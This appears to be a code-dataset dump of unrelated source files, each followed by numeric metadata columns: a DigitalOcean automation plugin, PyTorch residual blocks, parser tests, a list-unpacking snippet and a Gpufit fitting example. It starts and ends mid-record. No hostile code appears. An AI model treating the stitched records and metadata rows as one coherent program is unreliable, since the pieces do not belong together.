        self.apiToken = "ENC {0}".format(auth.getENCFromPassword(value))
        return True
class _digitaloceanGetDroplet(action._action):
    """Action that fetches a single droplet by its ID."""
    apiToken = str()
    dropletID = str()

    def run(self, data, persistentData, actionResult):
        """Resolve the droplet ID template and fetch the droplet."""
        token = auth.getPasswordFromENC(self.apiToken)
        droplet_id = helpers.evalString(self.dropletID, {"data": data})
        droplet = digitalocean._digitalocean(token).getDroplet(droplet_id)
        if not droplet:
            actionResult["result"] = False
            actionResult["rc"] = 500
            actionResult["msg"] = "Failed to get a valid response from API"
            return actionResult
        actionResult["result"] = True
        actionResult["rc"] = 0
        actionResult["droplet"] = droplet
        return actionResult

    def setAttribute(self, attr, value, sessionData=None):
        """Encrypt a plain-text apiToken before storing it; defer everything else."""
        if attr != "apiToken" or value.startswith("ENC "):
            return super(_digitaloceanGetDroplet, self).setAttribute(attr, value, sessionData=sessionData)
        if not db.fieldACLAccess(sessionData, self.acl, attr, accessType="write"):
            return False
        self.apiToken = "ENC {0}".format(auth.getENCFromPassword(value))
        return True
class _digitaloceanGetDropletPublicNetwork(action._action):
    """Action that fetches a droplet by ID including its network details."""
    apiToken = str()
    dropletID = str()

    def run(self, data, persistentData, actionResult):
        """Resolve the droplet ID template and fetch it with network=True."""
        token = auth.getPasswordFromENC(self.apiToken)
        droplet_id = helpers.evalString(self.dropletID, {"data": data})
        droplet = digitalocean._digitalocean(token).getDroplet(droplet_id, network=True)
        if not droplet:
            actionResult["result"] = False
            actionResult["rc"] = 500
            actionResult["msg"] = "Failed to get a valid response from API"
            return actionResult
        actionResult["result"] = True
        actionResult["rc"] = 0
        actionResult["droplet"] = droplet
        return actionResult

    def setAttribute(self, attr, value, sessionData=None):
        """Encrypt a plain-text apiToken before storing it; defer everything else."""
        if attr != "apiToken" or value.startswith("ENC "):
            return super(_digitaloceanGetDropletPublicNetwork, self).setAttribute(attr, value, sessionData=sessionData)
        if not db.fieldACLAccess(sessionData, self.acl, attr, accessType="write"):
            return False
        self.apiToken = "ENC {0}".format(auth.getENCFromPassword(value))
        return True
class _digitaloceanCreateDroplet(action._action):
    """Action that creates a new droplet from templated parameters."""
    apiToken = str()
    dropletName = str()
    region = str()
    image = str()
    size = str()
    ssh_key = str()

    def run(self, data, persistentData, actionResult):
        """Evaluate all templates and create the droplet; store its ID."""
        token = auth.getPasswordFromENC(self.apiToken)
        name = helpers.evalString(self.dropletName, {"data": data})
        region = helpers.evalString(self.region, {"data": data})
        image = helpers.evalString(self.image, {"data": data})
        size = helpers.evalString(self.size, {"data": data})
        # The API expects a numeric SSH key ID, wrapped in a list.
        key_id = int(helpers.evalString(self.ssh_key, {"data": data}))
        created = digitalocean._digitalocean(token).createDroplet(name, region, image, size, [key_id])
        if not created:
            actionResult["result"] = False
            actionResult["rc"] = 500
            actionResult["msg"] = "Failed to get a valid response from API"
            return actionResult
        actionResult["result"] = True
        actionResult["rc"] = 0
        actionResult["dropletID"] = created
        return actionResult

    def setAttribute(self, attr, value, sessionData=None):
        """Encrypt a plain-text apiToken before storing it; defer everything else."""
        if attr != "apiToken" or value.startswith("ENC "):
            return super(_digitaloceanCreateDroplet, self).setAttribute(attr, value, sessionData=sessionData)
        if not db.fieldACLAccess(sessionData, self.acl, attr, accessType="write"):
            return False
        self.apiToken = "ENC {0}".format(auth.getENCFromPassword(value))
        return True
class _digitaloceanDeleteDroplet(action._action):
    """Action that deletes a droplet by its ID."""
    apiToken = str()
    dropletID = str()

    def run(self, data, persistentData, actionResult):
        """Resolve the droplet ID template and request deletion."""
        token = auth.getPasswordFromENC(self.apiToken)
        droplet_id = helpers.evalString(self.dropletID, {"data": data})
        deleted = digitalocean._digitalocean(token).deleteDroplet(droplet_id)
        if not deleted:
            actionResult["result"] = False
            actionResult["rc"] = 500
            actionResult["msg"] = "Failed to get a valid response from API"
            return actionResult
        actionResult["result"] = True
        actionResult["rc"] = 0
        return actionResult

    def setAttribute(self, attr, value, sessionData=None):
        """Encrypt a plain-text apiToken before storing it; defer everything else."""
        if attr != "apiToken" or value.startswith("ENC "):
            return super(_digitaloceanDeleteDroplet, self).setAttribute(attr, value, sessionData=sessionData)
        if not db.fieldACLAccess(sessionData, self.acl, attr, accessType="write"):
            return False
        self.apiToken = "ENC {0}".format(auth.getENCFromPassword(value))
        return True
class _digitaloceanWaitForDroplet(action._action):
    """Action that blocks until a droplet becomes ready or a timeout elapses."""
    apiToken = str()
    dropletID = str()
    timeout = int()

    def run(self, data, persistentData, actionResult):
        """Wait for the droplet; a non-positive timeout falls back to 300s."""
        token = auth.getPasswordFromENC(self.apiToken)
        droplet_id = helpers.evalString(self.dropletID, {"data": data})
        wait_seconds = self.timeout if self.timeout > 0 else 300
        ready = digitalocean._digitalocean(token).waitForDroplet(droplet_id, timeout=wait_seconds)
        actionResult["result"] = ready
        actionResult["rc"] = 0
        return actionResult

    def setAttribute(self, attr, value, sessionData=None):
        """Encrypt a plain-text apiToken before storing it; defer everything else."""
        if attr != "apiToken" or value.startswith("ENC "):
            return super(_digitaloceanWaitForDroplet, self).setAttribute(attr, value, sessionData=sessionData)
        if not db.fieldACLAccess(sessionData, self.acl, attr, accessType="write"):
            return False
        self.apiToken = "ENC {0}".format(auth.getENCFromPassword(value))
        return True
class _digitaloceanListKeys(action._action):
    """Action that lists the SSH keys registered on the account."""
    apiToken = str()

    def run(self, data, persistentData, actionResult):
        """Fetch all keys; on success store them under actionResult["keys"]."""
        token = auth.getPasswordFromENC(self.apiToken)
        keys = digitalocean._digitalocean(token).listKeys()
        if not keys:
            actionResult["result"] = False
            actionResult["rc"] = 500
            actionResult["msg"] = "Failed to get a valid response from API"
            return actionResult
        actionResult["result"] = True
        actionResult["rc"] = 0
        actionResult["keys"] = keys
        return actionResult

    def setAttribute(self, attr, value, sessionData=None):
        """Encrypt a plain-text apiToken before storing it; defer everything else."""
        if attr != "apiToken" or value.startswith("ENC "):
            return super(_digitaloceanListKeys, self).setAttribute(attr, value, sessionData=sessionData)
        if not db.fieldACLAccess(sessionData, self.acl, attr, accessType="write"):
            return False
        self.apiToken = "ENC {0}".format(auth.getENCFromPassword(value))
        return True
class _digitaloceanGetKeyByName(action._action):
    """Action that looks an SSH key up by its name."""
    apiToken = str()
    keyName = str()

    def run(self, data, persistentData, actionResult):
        """Resolve the key-name template and fetch the matching key."""
        token = auth.getPasswordFromENC(self.apiToken)
        name = helpers.evalString(self.keyName, {"data": data})
        key = digitalocean._digitalocean(token).listKeys(name=name)
        if not key:
            actionResult["result"] = False
            actionResult["rc"] = 500
            actionResult["msg"] = "Failed to get a valid response from API"
            return actionResult
        actionResult["result"] = True
        actionResult["rc"] = 0
        actionResult["key"] = key
        return actionResult

    def setAttribute(self, attr, value, sessionData=None):
        """Encrypt a plain-text apiToken before storing it; defer everything else."""
        if attr != "apiToken" or value.startswith("ENC "):
            return super(_digitaloceanGetKeyByName, self).setAttribute(attr, value, sessionData=sessionData)
        if not db.fieldACLAccess(sessionData, self.acl, attr, accessType="write"):
            return False
        self.apiToken = "ENC {0}".format(auth.getENCFromPassword(value))
        return True
class _digitaloceanMyBalance(action._action):
    """Action that fetches the account's current balance."""
    apiToken = str()

    def run(self, data, persistentData, actionResult):
        """Fetch the balance; on success store it under actionResult["balance"]."""
        token = auth.getPasswordFromENC(self.apiToken)
        balance = digitalocean._digitalocean(token).getMyBalance()
        if not balance:
            actionResult["result"] = False
            actionResult["rc"] = 500
            actionResult["msg"] = "Failed to get a valid response from API"
            return actionResult
        actionResult["result"] = True
        actionResult["rc"] = 0
        actionResult["balance"] = balance
        return actionResult

    def setAttribute(self, attr, value, sessionData=None):
        """Encrypt a plain-text apiToken before storing it; defer everything else."""
        if attr != "apiToken" or value.startswith("ENC "):
            return super(_digitaloceanMyBalance, self).setAttribute(attr, value, sessionData=sessionData)
        if not db.fieldACLAccess(sessionData, self.acl, attr, accessType="write"):
            return False
        self.apiToken = "ENC {0}".format(auth.getENCFromPassword(value))
        return True
| 41.20922
| 113
| 0.637983
| 1,114
| 11,621
| 6.615799
| 0.088869
| 0.032564
| 0.054274
| 0.031208
| 0.821574
| 0.816147
| 0.777748
| 0.70787
| 0.70787
| 0.655902
| 0
| 0.005879
| 0.253507
| 11,621
| 282
| 114
| 41.20922
| 0.843689
| 0
| 0
| 0.751055
| 0
| 0
| 0.078902
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.084388
| false
| 0.084388
| 0.012658
| 0
| 0.400844
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
5bf9c213b3e1acc4d286e32769354b17e2db05ee
| 6,308
|
py
|
Python
|
vedastr_cstr/vedastr/models/utils/residual_module.py
|
bsm8734/formula-image-latex-recognition
|
86d5070e8f907571a47967d64facaee246d92a35
|
[
"MIT"
] | 13
|
2021-06-20T18:11:23.000Z
|
2021-12-07T18:06:42.000Z
|
vedastr_cstr/vedastr/models/utils/residual_module.py
|
bsm8734/formula-image-latex-recognition
|
86d5070e8f907571a47967d64facaee246d92a35
|
[
"MIT"
] | 9
|
2021-06-16T14:55:07.000Z
|
2021-06-23T14:45:36.000Z
|
vedastr_cstr/vedastr/models/utils/residual_module.py
|
bsm8734/formula-image-latex-recognition
|
86d5070e8f907571a47967d64facaee246d92a35
|
[
"MIT"
] | 6
|
2021-06-17T15:16:50.000Z
|
2021-07-05T20:41:26.000Z
|
from functools import partial
import torch.nn as nn
from torchvision.models.resnet import BasicBlock as BasicBlock_
from torchvision.models.resnet import Bottleneck as Bottleneck_
from torchvision.models.resnet import conv1x1
from .builder import build_module
from .norm import build_norm_layer
from .registry import UTILS
@UTILS.register_module
class BasicBlock(BasicBlock_):
    """torchvision ``BasicBlock`` extended with a configurable norm layer,
    optional average-pool downsampling and an optional plug-in module
    applied to the residual branch before the addition.
    """

    def __init__(self,
                 inplanes,
                 planes,
                 stride=1,
                 downsample=None,
                 groups=1,
                 base_width=64,
                 dilation=1,
                 avg_down=False,
                 norm_cfg=None,
                 plug_cfg=None):
        # Default to BatchNorm when no normalization config is given.
        if norm_cfg is None:
            norm_cfg = dict(type='BN')
        # Factory the torchvision parent calls each time it needs a norm layer.
        norm_layer = partial(
            build_norm_layer, norm_cfg, postfix='', layer_only=True)
        super(BasicBlock, self).__init__(
            inplanes=inplanes,
            planes=planes,
            stride=stride,
            downsample=downsample,
            groups=groups,
            base_width=base_width,
            dilation=dilation,
            norm_layer=norm_layer)
        # Rebuild the shortcut whenever the residual path changes shape.
        if stride != 1 or inplanes != planes:
            if avg_down:
                # Average-pool first, then stride-1 1x1 conv
                # (ResNet-D style anti-aliased downsampling).
                self.downsample = nn.Sequential(
                    nn.AvgPool2d((stride, stride), stride=stride),
                    conv1x1(inplanes, planes * self.expansion, stride=1),
                    norm_layer(planes * self.expansion),
                )
            else:
                self.downsample = nn.Sequential(
                    conv1x1(inplanes, planes * self.expansion, stride),
                    norm_layer(planes * self.expansion),
                )
        # Optional extra module (e.g. attention) applied before the addition.
        self.plug = build_module(plug_cfg) if plug_cfg is not None else None

    def forward(self, x):
        """Two-conv residual forward pass with the optional plug module."""
        identity = x
        out = self.conv1(x)
        out = self.bn1(out)
        out = self.relu(out)
        out = self.conv2(out)
        out = self.bn2(out)
        if self.downsample is not None:
            identity = self.downsample(x)
        if self.plug is not None:
            out = self.plug(out)
        out += identity
        out = self.relu(out)
        return out
@UTILS.register_module
class Bottleneck(Bottleneck_):
    """torchvision ``Bottleneck`` extended with a configurable norm layer,
    optional average-pool downsampling and an optional plug-in module
    applied to the residual branch before the addition.
    """

    def __init__(self,
                 inplanes,
                 planes,
                 stride=1,
                 downsample=None,
                 groups=1,
                 base_width=64,
                 dilation=1,
                 avg_down=False,
                 norm_cfg=None,
                 plug_cfg=None):
        # Default to BatchNorm when no normalization config is given.
        if norm_cfg is None:
            norm_cfg = dict(type='BN')
        # Factory the torchvision parent calls each time it needs a norm layer.
        norm_layer = partial(
            build_norm_layer, norm_cfg, postfix='', layer_only=True)
        super(Bottleneck, self).__init__(
            inplanes=inplanes,
            planes=planes,
            stride=stride,
            downsample=downsample,
            groups=groups,
            base_width=base_width,
            dilation=dilation,
            norm_layer=norm_layer)
        # NOTE(review): the trigger condition mirrors BasicBlock, but a
        # Bottleneck outputs planes * expansion channels, so the
        # inplanes == planes case may still need a shortcut — confirm intent.
        if stride != 1 or inplanes != planes:
            # BUG FIX: both branches used ``self.inplanes``, but the
            # torchvision parent never stores that attribute, so this path
            # raised AttributeError. Use the local argument, as BasicBlock does.
            if avg_down:
                self.downsample = nn.Sequential(
                    nn.AvgPool2d((stride, stride), stride=stride),
                    conv1x1(inplanes, planes * self.expansion, stride=1),
                    norm_layer(planes * self.expansion),
                )
            else:
                self.downsample = nn.Sequential(
                    conv1x1(inplanes, planes * self.expansion, stride),
                    norm_layer(planes * self.expansion),
                )
        # Optional extra module (e.g. attention) applied before the addition.
        self.plug = build_module(plug_cfg) if plug_cfg is not None else None

    def forward(self, x):
        """Three-conv bottleneck forward pass with the optional plug module."""
        identity = x
        out = self.conv1(x)
        out = self.bn1(out)
        out = self.relu(out)
        out = self.conv2(out)
        out = self.bn2(out)
        out = self.relu(out)
        out = self.conv3(out)
        out = self.bn3(out)
        if self.downsample is not None:
            identity = self.downsample(x)
        if self.plug is not None:
            out = self.plug(out)
        out += identity
        out = self.relu(out)
        return out
@UTILS.register_module
class BasicBlocks(nn.Module):
    """A sequential stack of ``BasicBlock`` modules.

    Only the first block receives the stride / downsample arguments; the
    remaining ``blocks - 1`` blocks keep the spatial resolution unchanged.
    """

    def __init__(
            self,
            inplanes,
            planes,
            stride=1,
            downsample=None,
            groups=1,
            base_width=64,
            dilation=1,
            avg_down=False,
            norm_cfg=None,
            plug_cfg=None,
            blocks=1,
    ):
        super().__init__()
        self.layers = nn.ModuleList()
        # First block may change stride / channels.
        self.layers.append(
            BasicBlock(inplanes, planes, stride, downsample, groups,
                       base_width, dilation, avg_down, norm_cfg, plug_cfg))
        # After the first block the input channel count follows the expansion.
        inplanes = BasicBlock.expansion * planes
        for i in range(blocks - 1):
            self.layers.append(
                BasicBlock(
                    inplanes,
                    planes,
                    groups=groups,
                    base_width=base_width,
                    dilation=dilation,
                    norm_cfg=norm_cfg,
                    plug_cfg=plug_cfg))

    def forward(self, x):
        """Apply every block in order."""
        for layer in self.layers:
            x = layer(x)
        return x
@UTILS.register_module
class Bottlenecks(nn.Module):
    """A sequential stack of ``Bottleneck`` modules.

    Only the first block receives the stride / downsample arguments; the
    remaining ``blocks - 1`` blocks keep the spatial resolution unchanged.
    """

    def __init__(
            self,
            inplanes,
            planes,
            stride=1,
            downsample=None,
            groups=1,
            base_width=64,
            dilation=1,
            avg_down=False,
            norm_cfg=None,
            plug_cfg=None,
            blocks=1,
    ):
        super().__init__()
        self.layers = nn.ModuleList()
        # First block may change stride / channels.
        self.layers.append(
            Bottleneck(inplanes, planes, stride, downsample, groups,
                       base_width, dilation, avg_down, norm_cfg, plug_cfg))
        # After the first block the input channel count follows the expansion.
        inplanes = Bottleneck.expansion * planes
        for i in range(blocks - 1):
            # BUG FIX: the remaining blocks were built as BasicBlock
            # (copy/paste from BasicBlocks), which breaks channel counts —
            # BasicBlock.expansion is 1 while this stack expects Bottleneck's
            # expansion. Repeat the stack's own block type instead.
            self.layers.append(
                Bottleneck(
                    inplanes,
                    planes,
                    groups=groups,
                    base_width=base_width,
                    dilation=dilation,
                    norm_cfg=norm_cfg,
                    plug_cfg=plug_cfg))

    def forward(self, x):
        """Apply every block in order."""
        for layer in self.layers:
            x = layer(x)
        return x
| 28.414414
| 78
| 0.516011
| 652
| 6,308
| 4.819018
| 0.119632
| 0.037874
| 0.028644
| 0.022279
| 0.888288
| 0.856779
| 0.853596
| 0.844367
| 0.844367
| 0.844367
| 0
| 0.013231
| 0.400919
| 6,308
| 221
| 79
| 28.542986
| 0.818206
| 0
| 0
| 0.851852
| 0
| 0
| 0.000634
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042328
| false
| 0
| 0.042328
| 0
| 0.126984
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
754125dcd4b3719182414874c80ef2a81b9df8da
| 3,518
|
py
|
Python
|
tests/test_parser.py
|
zzxuanyuan/osgparse
|
f894729f159c7f06dcbe14f7c70889a19db3fcb9
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_parser.py
|
zzxuanyuan/osgparse
|
f894729f159c7f06dcbe14f7c70889a19db3fcb9
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_parser.py
|
zzxuanyuan/osgparse
|
f894729f159c7f06dcbe14f7c70889a19db3fcb9
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sys
import pytest
import filecmp
from cStringIO import StringIO
import osgparse
import osgparse.parser
import osgparse.constants
def _run_parser_case(case_name):
    """Shared body for all parser round-trip tests.

    Parses ``data/<case_name>``, captures the snapshot's sorted dump from
    stdout into ``files/result_<case_name>.ini``, compares it against
    ``files/expected_<case_name>.ini`` and removes the temporary file.
    """
    osgparse.constants.init()
    dir_path = os.path.dirname(os.path.realpath(__file__))
    file_path = dir_path + "/data/" + case_name
    tmp_path = dir_path + "/files/result_" + case_name + ".ini"
    with open(file_path, "r") as f:
        line = f.read()
    parser = osgparse.parser.Parser()
    snapshot = parser.read_line(line)
    # sorted_dump() writes to stdout, so temporarily redirect it to a buffer.
    old_stdout = sys.stdout
    sys.stdout = tmpstdout = StringIO()
    snapshot.sorted_dump()
    sys.stdout = old_stdout
    with open(tmp_path, "w") as o:
        o.write(tmpstdout.getvalue())
    expect_path = dir_path + "/files/expected_" + case_name + ".ini"
    assert filecmp.cmp(tmp_path, expect_path)
    os.remove(tmp_path)


def test_parser_read_single_item():
    _run_parser_case("single_item")


def test_parser_read_two_diff_items():
    _run_parser_case("two_diff_items")


def test_parser_read_four_diff_items():
    _run_parser_case("four_diff_items")


def test_parser_read_three_same_items():
    _run_parser_case("three_same_items")


def test_parser_read_two_same_items_but_diff_resources():
    # NOTE(review): the original test body used the
    # "three_same_items_but_diff_resources" fixture despite the "two" in the
    # test name — preserved as-is; confirm which was intended.
    _run_parser_case("three_same_items_but_diff_resources")
| 30.327586
| 83
| 0.755543
| 546
| 3,518
| 4.551282
| 0.108059
| 0.056338
| 0.066398
| 0.064386
| 0.908652
| 0.898592
| 0.882093
| 0.869215
| 0.841851
| 0.812475
| 0
| 0.000323
| 0.119102
| 3,518
| 115
| 84
| 30.591304
| 0.801549
| 0.005969
| 0
| 0.714286
| 0
| 0
| 0.143961
| 0.130509
| 0
| 0
| 0
| 0
| 0.05102
| 1
| 0.05102
| false
| 0
| 0.081633
| 0
| 0.132653
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7557106ff0f9a60d5f80521812691e306a722b03
| 82
|
py
|
Python
|
standard_lib/list_unpacking.py
|
DahlitzFlorian/python-snippets
|
212f63f820b6f5842f74913ed08da18d41dfe7a4
|
[
"MIT"
] | 29
|
2019-03-25T09:35:12.000Z
|
2022-01-08T22:09:03.000Z
|
standard_lib/list_unpacking.py
|
DahlitzFlorian/python-snippets
|
212f63f820b6f5842f74913ed08da18d41dfe7a4
|
[
"MIT"
] | null | null | null |
standard_lib/list_unpacking.py
|
DahlitzFlorian/python-snippets
|
212f63f820b6f5842f74913ed08da18d41dfe7a4
|
[
"MIT"
] | 4
|
2020-05-19T21:18:12.000Z
|
2021-05-18T12:49:21.000Z
|
# Extended iterable unpacking: the first and last values are bound directly,
# everything in between is collected into the list ``b``.
a, *b, c = [1, 2, 3, 4, 5]
for _name, _value in (("a", a), ("b", b), ("c", c)):
    print(f"{_name} = {_value}")
| 13.666667
| 26
| 0.390244
| 20
| 82
| 1.6
| 0.5
| 0.5625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.079365
| 0.231707
| 82
| 5
| 27
| 16.4
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0.256098
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.75
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
f33f495fb4f8a07a8350c2e92227cdc595b99f52
| 22
|
py
|
Python
|
array_analyzer/extract/__init__.py
|
mehta-lab/pysero
|
c8dbdc8c98c134dd9647e691bc92eaef4301effa
|
[
"MIT"
] | 6
|
2020-05-12T22:07:15.000Z
|
2020-10-31T21:23:04.000Z
|
array_analyzer/extract/__init__.py
|
mehta-lab/pysero
|
c8dbdc8c98c134dd9647e691bc92eaef4301effa
|
[
"MIT"
] | 39
|
2020-04-26T02:22:29.000Z
|
2021-09-17T17:59:58.000Z
|
array_analyzer/extract/__init__.py
|
mehta-lab/pysero
|
c8dbdc8c98c134dd9647e691bc92eaef4301effa
|
[
"MIT"
] | 3
|
2020-05-06T14:15:59.000Z
|
2021-07-21T04:28:39.000Z
|
# bchhun, {2020-03-23}
| 22
| 22
| 0.636364
| 4
| 22
| 3.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.4
| 0.090909
| 22
| 1
| 22
| 22
| 0.3
| 0.909091
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
340f11c2756a0d7083acdfbc139f28f78005d03c
| 11,011
|
py
|
Python
|
Gpufit/python/examples/pyDixon_Timing.py
|
ironictoo/Gpufit
|
a2d72b8f676b20b5fea91b5e61562e8fa6b34048
|
[
"MIT"
] | 1
|
2019-08-22T06:46:58.000Z
|
2019-08-22T06:46:58.000Z
|
Gpufit/python/examples/pyDixon_Timing.py
|
lsaca05/Gpufit
|
735e1be542fb3d1e1732c9a9955eab6e634dc904
|
[
"MIT"
] | null | null | null |
Gpufit/python/examples/pyDixon_Timing.py
|
lsaca05/Gpufit
|
735e1be542fb3d1e1732c9a9955eab6e634dc904
|
[
"MIT"
] | 2
|
2019-10-13T20:24:03.000Z
|
2021-06-15T00:52:34.000Z
|
"""
Example of the Python binding of the Gpufit library which implements
Levenberg Marquardt curve fitting in CUDA
https://github.com/gpufit/Gpufit
"""
import numpy as np
import matplotlib.pyplot as plt
import pygpufit.gpufit as gf
import cmath
def _model_three(p, c_n, te):
    """Three-parameter liver-fat signal: water and fat share one R2* decay."""
    return abs((p[0] + c_n * p[1]) * np.exp(-1 * p[2] * te))


def _model_four(p, c_n, te):
    """Four-parameter liver-fat signal: water and fat decay independently."""
    return abs(p[0] * np.exp(-1 * p[2] * te) + c_n * p[1] * np.exp(-1 * p[3] * te))


def _run_timing(model_id, true_parameters, tolerance, signal_model, label):
    """Simulate Rician-noised multi-echo liver-fat data and time a Gpufit fit.

    Parameters
    ----------
    model_id : Gpufit model identifier (LIVER_FAT_THREE / LIVER_FAT_FOUR).
    true_parameters : float32 array of ground-truth model parameters; its
        length determines the number of fitted parameters.
    tolerance : fit tolerance forwarded to gf.fit.
    signal_model : callable (params, C_n, TE) -> noiseless signal magnitude.
    label : text used in the final per-parameter summary print.

    The random draw order matches the original script exactly, so the fixed
    seed produces identical data and initial guesses.
    """
    # cuda available checks
    print('CUDA available: {}'.format(gf.cuda_available()))
    if not gf.cuda_available():
        raise RuntimeError(gf.get_last_error())
    print('CUDA versions runtime: {}, driver: {}'.format(*gf.get_cuda_version()))
    # Signal to Noise Ratio
    snr = 50
    # number of fits and fit points
    number_fits = 100
    number_points = 6
    number_parameters = len(true_parameters)
    # Echo Times
    TEn = np.array((1.23, 2.48, 3.65, 4.84, 6.03, 7.22), dtype=np.float32)
    sigma = (true_parameters[0] + true_parameters[1]) / snr
    # initialize random number generator (fixed seed -> reproducible runs)
    np.random.seed(0)
    # random initial guesses in [0.5, 1.5) * truth, drawn parameter-major
    # per fit to replicate the original draw sequence
    initial_parameters = np.zeros((number_fits, number_parameters), dtype=np.float32)
    for n in range(0, number_fits):
        for p in range(number_parameters):
            initial_parameters[n, p] = true_parameters[p] * (0.5 + 1 * np.random.uniform())
    # seven-peak fat spectrum: ppm offsets and relative peak weights
    ppm_list = [-0.4764702, -0.4253742, -0.3883296, -0.332124, -0.3040212, -0.2375964, 0.0868632]
    i = complex(0, 1)
    weight_list = [0.08, 0.63, 0.07, 0.09, 0.07, 0.02, 0.04]
    # generating data with Rician noise
    data = np.zeros((number_fits, number_points), dtype=np.float32)
    for l in range(0, number_fits):
        for m in range(0, number_points):
            # complex fat modulation at this echo time
            C_n = 0
            for n in range(0, 7):
                C_n += weight_list[n] * np.exp(i * 2 * cmath.pi * ppm_list[n] * TEn[m])
            y = signal_model(true_parameters, C_n, TEn[m])
            rician_noise = cmath.sqrt(np.random.normal(0, sigma) ** 2 + np.random.normal(0, sigma) ** 2)
            data[l, m] = (abs(y + rician_noise))
            if l == number_fits - 1:
                print("y ", y)
                print("rician noise ", rician_noise)
                print("y with noise ", data[l, m])
                print()
    # use this to check how data is being collected
    signal = np.mean(data[:, 0])
    noise = np.std(data[:, 0])
    SNR_actual = signal / noise
    print("input SNR ", snr)
    print("actual SNR ", SNR_actual)
    # maximum number of iterations
    max_number_iterations = 200
    # run Gpufit
    parameters, states, chi_squares, number_iterations, execution_time = gf.fit(
        data, None, model_id, initial_parameters,
        tolerance, max_number_iterations, None, None, TEn)
    # print fit results
    converged = states == 0
    print('\n\n*Gpufit*')
    # checking how parameters are made
    print('\n\nParameters\n', parameters)
    # print summary
    print('\nmodel ID: {}'.format(model_id))
    print('number of fits: {}'.format(number_fits))
    print('mean chi_square: {:.2f}'.format(np.mean(chi_squares[converged])))
    print('iterations: {:.2f}'.format(np.mean(number_iterations[converged])))
    print('time: {:.2f} s'.format(execution_time))
    # get fit states
    number_converged = np.sum(converged)
    print('\nratio converged {:6.2f} %'.format(number_converged / number_fits * 100))
    print('ratio max it. exceeded {:6.2f} %'.format(np.sum(states == 1) / number_fits * 100))
    print('ratio singular hessian {:6.2f} %'.format(np.sum(states == 2) / number_fits * 100))
    print('ratio neg curvature MLE {:6.2f} %'.format(np.sum(states == 3) / number_fits * 100))
    # mean, std of fitted parameters (converged fits only)
    converged_parameters = parameters[converged, :]
    converged_parameters_mean = np.mean(converged_parameters, axis=0)
    converged_parameters_std = np.std(converged_parameters, axis=0)
    print('\nparameters of {}'.format(label))
    for i in range(number_parameters):
        print('p{} true {:6.2f} mean {:6.2f} std {:6.2f}'.format(i, true_parameters[i], converged_parameters_mean[i], converged_parameters_std[i]))


if __name__ == '__main__':
    Model_id_pick = input("select a method (3 or 4): ")
    if Model_id_pick == "3":
        _run_timing(gf.ModelID.LIVER_FAT_THREE,
                    np.array((210, 20, 0.1), dtype=np.float32),
                    10e-3, _model_three, 'Liver Fat 3')
    elif Model_id_pick == "4":
        _run_timing(gf.ModelID.LIVER_FAT_FOUR,
                    np.array((290.21, 44.11, 0.05, 0.11), dtype=np.float32),
                    10e-5, _model_four, 'Liver Fat 4')
    else:
        # BUG FIX: the farewell was attached only to the `== "4"` check, so
        # selecting "3" ran the fit AND printed "ending program now".
        print("ending program now")
| 41.708333
| 156
| 0.545727
| 1,368
| 11,011
| 4.251462
| 0.148392
| 0.062586
| 0.040234
| 0.006018
| 0.93621
| 0.93621
| 0.93621
| 0.93621
| 0.93174
| 0.928645
| 0
| 0.057823
| 0.316774
| 11,011
| 264
| 157
| 41.708333
| 0.715273
| 0.1543
| 0
| 0.834532
| 0
| 0
| 0.106037
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028777
| 0
| 0.028777
| 0.309353
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
341b337b6e5c1019e4d21be528937dccafdb261a
| 5,323
|
py
|
Python
|
investment_atlas/tests/test_forms.py
|
froddd/great-international-ui
|
414bcb09d701cd7e0c5748d1ac8c587d704f92da
|
[
"MIT"
] | 1
|
2019-03-22T09:45:00.000Z
|
2019-03-22T09:45:00.000Z
|
investment_atlas/tests/test_forms.py
|
froddd/great-international-ui
|
414bcb09d701cd7e0c5748d1ac8c587d704f92da
|
[
